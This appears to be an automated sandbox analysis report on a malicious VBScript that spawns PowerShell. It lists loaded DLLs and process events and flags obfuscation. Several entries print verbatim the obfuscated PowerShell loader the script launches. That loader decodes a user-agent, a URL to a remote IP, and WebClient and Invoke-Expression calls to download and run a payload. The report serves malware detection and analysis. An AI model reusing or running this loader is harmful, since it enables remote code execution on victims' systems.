Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;$Limpid=$host.PrivateData;If ($Limpid) {$Navicert++;}function Opbrugets52($Craftsmaster){$Postnarisnhaust=$Hellenist+$Craftsmaster.Length-$Navicert;for( $Postnaris=4;$Postnaris -lt $Postnarisnhaust;$Postnaris+=5){$Samfundslrers='nonfecund';$Informativ+=$Craftsmaster[$Postnaris];}$Informativ;}function ggepuncherne($Unpopulousness27){ & ($Topographometric) ($Unpopulousness27);}$Postnarisnertion254=Opbrugets52 'TimeMDe eo M kzVulciStillsoc l C aa Hvs/G,or5Hazi.Skak0Skun Grip(AkadWA lei C.nnUdbedOveroPreswBoilsBekj KabeNAntiTCoss Klud1Paul0,ash. Bar0Dest;A te SoftWLigniDytinEpid6.orl4Soda;P.oc VidxCer,6Sona4 nde;Unle Ra.r .rov,idg:Radi1 Med2 Moc1Brss. hon0Mode)F ey SporGMrkve FircMettkChito Tan/ Bl 2Cong0For,1 amm0Hymn0Insp1Skib0Mot,1Ring beblFFkaliHoldrLysbe.errfPicropeerxFrys/M sk1ce t2Unco1Lat . rdi0 Uds ';$billardkugle=Opbrugets52 'Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete ';$Ugenummer=Opbrugets52 ' An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ';$onymize=Opbrugets52 'Plat>Awap ';$Topographometric=Opbrugets52 'BangIMa mE skuxKalk ';$nonhallucinatory='Selsparks';$Garwin='\Dorgens.Uns';ggepuncherne (Opbrugets52 'bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ');ggepuncherne (Opbrugets52 ' kyl$MolygIllulBetvoOri bSkina SkulOver: jerSSproaSapolO toa ecim rliaAn nnHermdskytr StiiRestnUtt eunre= T.e$.cheUFor g oneCasqnCarou,amlm ModmS.aceBrevrHo s. ompsEvalpFinnlSk.niHudktMagn(Ac,c$ TrioStkinBundy kytm UneiIn.oz Un,eGad )Armi ');ggepuncherne (Opbrugets52 'Kate[OpvuNFrfreCowstSank.EjakS BejeLicerRefivforhiinf.cBreaeA,stP .peoHabii AllnTr vtJermMHa,daTrevn fllaUtengPreaeSl,tr rdt]traw: Ci.: AsySPolleEliac aleucyrtrO,dniLet,tTel,yPersPDirrr Nono C.st.unoo Pr,cKeepoCadrlJudo Hamm=Atta Un.r[ DiaNcop eIndftMile.MammSColoeStuccMentusolbrBog,i Altt rmayAnglPContr udio attt BefoAspacArchoFredlTriaTBragyd rnpti.geM ck] rer:Rej :MuniT Taml BolsKamf1Noci2I.fl ');$Ugenummer=$Salamandrine[0];$Hexactinellid40=(Opbrugets52 'Le a$,ircGTanol jesoSperBCondA Skrlbela:CupoGOrigrGtebuuntiiHemoN onseKor =Poc,NHaece H.mWB.it-cnidOMirabultrjBaroETracCOxaltF,st s nssW.rsyNe,tsByghtMy,ieRubem s c.WaitN.uldeVaret rni.Fa iwBiseeForbbForecAub LveteISu.ee C nN BavT Dec ');ggepuncherne ($Hexactinellid40);ggepuncherne (Opbrugets52 ' S,n$FloaGBe orIntruhawkiZ.opnKonfeGirl.MohaH IsoePseuaMudcdRetseQ.adrArris inn[ Por$Fo dbFr siuklalcomplOut,a xcer .ond utukCharuPilegKos.lTo.ve.nto]Frek=
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;$Limpid=$host.PrivateData;If ($Limpid) {$Navicert++;}function Opbrugets52($Craftsmaster){$Postnarisnhaust=$Hellenist+$Craftsmaster.Length-$Navicert;for( $Postnaris=4;$Postnaris -lt $Postnarisnhaust;$Postnaris+=5){$Samfundslrers='nonfecund';$Informativ+=$Craftsmaster[$Postnaris];}$Informativ;}function ggepuncherne($Unpopulousness27){ & ($Topographometric) ($Unpopulousness27);}$Postnarisnertion254=Opbrugets52 'TimeMDe eo M kzVulciStillsoc l C aa Hvs/G,or5Hazi.Skak0Skun Grip(AkadWA lei C.nnUdbedOveroPreswBoilsBekj KabeNAntiTCoss Klud1Paul0,ash. Bar0Dest;A te SoftWLigniDytinEpid6.orl4Soda;P.oc VidxCer,6Sona4 nde;Unle Ra.r .rov,idg:Radi1 Med2 Moc1Brss. hon0Mode)F ey SporGMrkve FircMettkChito Tan/ Bl 2Cong0For,1 amm0Hymn0Insp1Skib0Mot,1Ring beblFFkaliHoldrLysbe.errfPicropeerxFrys/M sk1ce t2Unco1Lat . rdi0 Uds ';$billardkugle=Opbrugets52 'Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete ';$Ugenummer=Opbrugets52 ' An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ';$onymize=Opbrugets52 'Plat>Awap ';$Topographometric=Opbrugets52 'BangIMa mE skuxKalk ';$nonhallucinatory='Selsparks';$Garwin='\Dorgens.Uns';ggepuncherne (Opbrugets52 'bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ');ggepuncherne (Opbrugets52 ' kyl$MolygIllulBetvoOri bSkina SkulOver: jerSSproaSapolO toa ecim rliaAn nnHermdskytr StiiRestnUtt eunre= T.e$.cheUFor g oneCasqnCarou,amlm ModmS.aceBrevrHo s. ompsEvalpFinnlSk.niHudktMagn(Ac,c$ TrioStkinBundy kytm UneiIn.oz Un,eGad )Armi ');ggepuncherne (Opbrugets52 'Kate[OpvuNFrfreCowstSank.EjakS BejeLicerRefivforhiinf.cBreaeA,stP .peoHabii AllnTr vtJermMHa,daTrevn fllaUtengPreaeSl,tr rdt]traw: Ci.: AsySPolleEliac aleucyrtrO,dniLet,tTel,yPersPDirrr Nono C.st.unoo Pr,cKeepoCadrlJudo Hamm=Atta Un.r[ DiaNcop eIndftMile.MammSColoeStuccMentusolbrBog,i Altt rmayAnglPContr udio attt BefoAspacArchoFredlTriaTBragyd rnpti.geM ck] rer:Rej :MuniT Taml BolsKamf1Noci2I.fl ');$Ugenummer=$Salamandrine[0];$Hexactinellid40=(Opbrugets52 'Le a$,ircGTanol jesoSperBCondA Skrlbela:CupoGOrigrGtebuuntiiHemoN onseKor =Poc,NHaece H.mWB.it-cnidOMirabultrjBaroETracCOxaltF,st s nssW.rsyNe,tsByghtMy,ieRubem s c.WaitN.uldeVaret rni.Fa iwBiseeForbbForecAub LveteISu.ee C nN BavT Dec ');ggepuncherne ($Hexactinellid40);ggepuncherne (Opbrugets52 ' S,n$FloaGBe orIntruhawkiZ.opnKonfeGirl.MohaH IsoePseuaMudcdRetseQ.adrArris inn[ Por$Fo dbFr siuklalcomplOut,a xcer .ond utukCharuPilegKos.lTo.ve.nto]Frek=	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: powershell.exe, 00000002.00000002.3349546170.000001BF32E94000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.2053986258.0000021294821000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2045877123.0000021294621000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000002.00000002.3349546170.000001BF32E94000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ion.pdb source: powershell.exe, 00000002.00000002.3349546170.000001BF32E29000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdblz[ source: powershell.exe, 00000002.00000002.3350719704.000001BF33118000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("powershell "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Prerem", "Unsupported parameter type 00000000")

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;$Limpid=$host.PrivateData;If ($Limpid) {$Navicert++;}function Opbrugets52($Craftsmaster){$Postnarisnhaust=$Hellenist+$Craftsmaster.Length-$Navicert;for( $Postnaris=4;$Postnaris -lt $Postnarisnhaust;$Postnaris+=5){$Samfundslrers='nonfecund';$Informativ+=$Craftsmaster[$Postnaris];}$Informativ;}function ggepuncherne($Unpopulousness27){ & ($Topographometric) ($Unpopulousness27);}$Postnarisnertion254=Opbrugets52 'TimeMDe eo M kzVulciStillsoc l C aa Hvs/G,or5Hazi.Skak0Skun Grip(AkadWA lei C.nnUdbedOveroPreswBoilsBekj KabeNAntiTCoss Klud1Paul0,ash. Bar0Dest;A te SoftWLigniDytinEpid6.orl4Soda;P.oc VidxCer,6Sona4 nde;Unle Ra.r .rov,idg:Radi1 Med2 Moc1Brss. hon0Mode)F ey SporGMrkve FircMettkChito Tan/ Bl 2Cong0For,1 amm0Hymn0Insp1Skib0Mot,1Ring beblFFkaliHoldrLysbe.errfPicropeerxFrys/M sk1ce t2Unco1Lat . rdi0 Uds ';$billardkugle=Opbrugets52 'Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete ';$Ugenummer=Opbrugets52 ' An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ';$onymize=Opbrugets52 'Plat>Awap ';$Topographometric=Opbrugets52 'BangIMa mE skuxKalk ';$nonhallucinatory='Selsparks';$Garwin='\Dorgens.Uns';ggepuncherne (Opbrugets52 'bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ');ggepuncherne (Opbrugets52 ' kyl$MolygIllulBetvoOri bSkina SkulOver: jerSSproaSapolO toa ecim rliaAn nnHermdskytr StiiRestnUtt eunre= T.e$.cheUFor g oneCasqnCarou,amlm ModmS.aceBrevrHo s. ompsEvalpFinnlSk.niHudktMagn(Ac,c$ TrioStkinBundy kytm UneiIn.oz Un,eGad )Armi ');ggepuncherne (Opbrugets52 'Kate[OpvuNFrfreCowstSank.EjakS BejeLicerRefivforhiinf.cBreaeA,stP .peoHabii AllnTr vtJermMHa,daTrevn fllaUtengPreaeSl,tr rdt]traw: Ci.: AsySPolleEliac aleucyrtrO,dniLet,tTel,yPersPDirrr Nono C.st.unoo Pr,cKeepoCadrlJudo Hamm=Atta Un.r[ DiaNcop eIndftMile.MammSColoeStuccMentusolbrBog,i Altt rmayAnglPContr udio attt BefoAspacArchoFredlTriaTBragyd rnpti.geM ck] rer:Rej :MuniT Taml BolsKamf1Noci2I.fl ');$Ugenummer=$Salamandrine[0];$Hexactinellid40=(Opbrugets52 'Le a$,ircGTanol jesoSperBCondA Skrlbela:CupoGOrigrGtebuuntiiHemoN onseKor =Poc,NHaece H.mWB.it-cnidOMirabultrjBaroETracCOxaltF,st s nssW.rsyNe,tsByghtMy,ieRubem s c.WaitN.uldeVaret rni.Fa iwBiseeForbbForecAub LveteISu.ee C nN BavT Dec ');ggepuncherne ($Hexactinellid40);ggepuncherne (Opbrugets52 ' S,n$FloaGBe orIntruhawkiZ.opnKonfeGirl.MohaH IsoePseuaMudcdRetseQ.adrArris inn[ Por$Fo dbFr siuklalcomplOut,a xcer .ond utukCharuPilegKos.lTo.ve.nto]Frek=
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;$Limpid=$host.PrivateData;If ($Limpid) {$Navicert++;}function Opbrugets52($Craftsmaster){$Postnarisnhaust=$Hellenist+$Craftsmaster.Length-$Navicert;for( $Postnaris=4;$Postnaris -lt $Postnarisnhaust;$Postnaris+=5){$Samfundslrers='nonfecund';$Informativ+=$Craftsmaster[$Postnaris];}$Informativ;}function ggepuncherne($Unpopulousness27){ & ($Topographometric) ($Unpopulousness27);}$Postnarisnertion254=Opbrugets52 'TimeMDe eo M kzVulciStillsoc l C aa Hvs/G,or5Hazi.Skak0Skun Grip(AkadWA lei C.nnUdbedOveroPreswBoilsBekj KabeNAntiTCoss Klud1Paul0,ash. Bar0Dest;A te SoftWLigniDytinEpid6.orl4Soda;P.oc VidxCer,6Sona4 nde;Unle Ra.r .rov,idg:Radi1 Med2 Moc1Brss. hon0Mode)F ey SporGMrkve FircMettkChito Tan/ Bl 2Cong0For,1 amm0Hymn0Insp1Skib0Mot,1Ring beblFFkaliHoldrLysbe.errfPicropeerxFrys/M sk1ce t2Unco1Lat . rdi0 Uds ';$billardkugle=Opbrugets52 'Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete ';$Ugenummer=Opbrugets52 ' An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ';$onymize=Opbrugets52 'Plat>Awap ';$Topographometric=Opbrugets52 'BangIMa mE skuxKalk ';$nonhallucinatory='Selsparks';$Garwin='\Dorgens.Uns';ggepuncherne (Opbrugets52 'bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ');ggepuncherne (Opbrugets52 ' kyl$MolygIllulBetvoOri bSkina SkulOver: jerSSproaSapolO toa ecim rliaAn nnHermdskytr StiiRestnUtt eunre= T.e$.cheUFor g oneCasqnCarou,amlm ModmS.aceBrevrHo s. ompsEvalpFinnlSk.niHudktMagn(Ac,c$ TrioStkinBundy kytm UneiIn.oz Un,eGad )Armi ');ggepuncherne (Opbrugets52 'Kate[OpvuNFrfreCowstSank.EjakS BejeLicerRefivforhiinf.cBreaeA,stP .peoHabii AllnTr vtJermMHa,daTrevn fllaUtengPreaeSl,tr rdt]traw: Ci.: AsySPolleEliac aleucyrtrO,dniLet,tTel,yPersPDirrr Nono C.st.unoo Pr,cKeepoCadrlJudo Hamm=Atta Un.r[ DiaNcop eIndftMile.MammSColoeStuccMentusolbrBog,i Altt rmayAnglPContr udio attt BefoAspacArchoFredlTriaTBragyd rnpti.geM ck] rer:Rej :MuniT Taml BolsKamf1Noci2I.fl ');$Ugenummer=$Salamandrine[0];$Hexactinellid40=(Opbrugets52 'Le a$,ircGTanol jesoSperBCondA Skrlbela:CupoGOrigrGtebuuntiiHemoN onseKor =Poc,NHaece H.mWB.it-cnidOMirabultrjBaroETracCOxaltF,st s nssW.rsyNe,tsByghtMy,ieRubem s c.WaitN.uldeVaret rni.Fa iwBiseeForbbForecAub LveteISu.ee C nN BavT Dec ');ggepuncherne ($Hexactinellid40);ggepuncherne (Opbrugets52 ' S,n$FloaGBe orIntruhawkiZ.opnKonfeGirl.MohaH IsoePseuaMudcdRetseQ.adrArris inn[ Por$Fo dbFr siuklalcomplOut,a xcer .ond utukCharuPilegKos.lTo.ve.nto]Frek=			Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848DB7969 push ebx; retf	2_2_00007FF848DB796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848DB00BD pushad ; iretd	2_2_00007FF848DB00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848E879C9 push ebx; ret	2_2_00007FF848E879CA

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
